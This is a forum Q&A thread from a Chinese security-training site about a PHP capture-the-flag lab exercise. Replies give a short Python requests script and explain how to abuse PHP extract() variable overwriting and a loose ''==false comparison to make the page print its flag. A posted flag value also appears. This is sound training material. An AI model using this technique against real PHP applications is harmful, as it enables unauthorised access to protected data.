按照视频讲解，传入aurora&flag参数，无法获得flag-看雪学苑-看雪-安全培训|安全招聘|www.kanxue.com

按照视频讲解，传入aurora&flag参数，无法获得flag

mb_ypixobsb 2025-4-1 482

源自：视频：2-10 世界上最好语言：PHP基本漏洞分析与实操讲解-exps-extract

http://d45462f4-ee6c-40fa-9377-c3062e480314.node.pediy.com:81/extract.php/?aurora&flag

2条回答

四叶草不幸运 2025-4-9

可以参考我写的，使用post请求

import requests
 
url = "http://cbc416fc-215d-4a97-be1b-d3116b3885f2.node.pediy.com:81/extract.php"
 
# 不覆盖 $flag，让其使用默认值（由 extract_flag.php 提供）
params = {
    "aurora": ""  # 占个位，先触发 isset
}
 
# 关键！发送 POST 内容：内容必须等于 flag 文件的内容
# 我们先猜测真实 flag 内容（不行就爆破）
response = requests.post(url, params=params, data="ctf{YOU_4re_DO1ng_GREAT!}", verify=False)
print("响应内容：")
print(response.text)

mb_xeewulbv 2025-5-24

不要覆盖$flag变量,$flag在extract_flag.php中定义了,是本题的答案,是一个字符串,所以没有这个文件,所以file_get_contents( $f l a g), f a l s e, a u r o r a, i f ($ aurora == $content)这一步比较就是if("" == false),由于是弱类型比较,所以为true,就把\$ flag输出了，只需要传aurora就行了，http://xxxxxxxxx.node.pediy.com:81/extract.php/?aurora